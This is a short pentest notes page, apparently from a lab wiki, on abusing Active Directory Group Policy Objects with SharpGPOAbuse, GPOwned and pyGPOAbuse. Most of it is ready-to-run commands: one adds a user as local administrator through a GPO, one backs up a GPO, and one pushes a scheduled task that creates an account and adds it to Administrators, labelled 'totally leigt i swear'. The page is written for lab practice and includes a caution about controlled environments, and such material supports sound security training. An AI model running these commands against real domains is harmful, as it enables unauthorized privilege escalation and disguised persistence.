GPO Attacks

We discussed the theory behind GPOs here.

To abuse GPOs from windows we mainly use SharpGPOAbuse

Option	Description
--AddUserRights	Add rights to a user
--AddLocalAdmin	Add a user to the local admins group
--AddComputerScript	Add a new computer startup script
--AddUserScript	Configure a user logon script
--AddComputerTask	Configure a computer immediate task
--AddUserTask	Add an immediate task to a user

Option

Description

--AddUserRights

Add rights to a user

--AddLocalAdmin

Add a user to the local admins group

--AddComputerScript

Add a new computer startup script

--AddUserScript

Configure a user logon script

--AddComputerTask

Configure a computer immediate task

--AddUserTask

Add an immediate task to a user

For example we can use AddLocalAdmin to grant administrative access to a user

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount otter --GPOName "Default Security Policy - WKS"

[!info] --AddLocalAdmin option will overwrite any existing Administrator if this policy is given higher priority. This could create problems if the Administrators or any other options are locally set on the machines, as they will be replaced. It is recommended to experiment with these changes in a controlled environment, such as this lab.

To abuse GPOs from Linux we use pyGPOAbuse.

Before we abuse this GPO, let's create a backup so we can restore it once we are done

python3 GPOwned.py -u otter -p 'SomethingSecure123!' -d domain.com -dc-ip 10.10.10.10 -gpcmachine -backup backupgpo -name "{<GUID>}"

Next we can modify the GPO: this tool allowed us to run PowerShell or cmd commands with the options -PowerShell or -command, respectively

python3 pygpoabuse.py domain.com/otter:'SomethingSecure123!' -gpo-id <GPO_ID> -command "net user plaintext Password1234 /add && net localgroup Administrators plaintext /add" -taskname "addAdmin" -description "totally leigt i swear" -dc-ip 10.10.10.10 -v

PreviousAddMembers NextGranting Rights and Ownership

Last updated 16 days ago